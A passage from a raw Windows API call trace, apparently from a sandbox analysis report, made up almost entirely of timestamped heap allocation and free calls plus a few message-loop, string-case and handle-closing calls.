wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.830] CryptReleaseContext (hProv=0xad2c70, dwFlags=0x0) returned 1 [0251.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0251.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0251.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0251.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0251.832] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0251.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0251.833] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0251.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.833] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0251.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0251.833] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0251.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0251.834] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0251.834] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.834] FreeLibrary (hLibModule=0x74d40000) returned 1 [0251.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.835] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.835] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.835] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0251.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0251.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.836] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0251.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0251.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0251.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0251.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.838] CloseHandle (hObject=0x294) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0251.839] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0251.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0251.842] 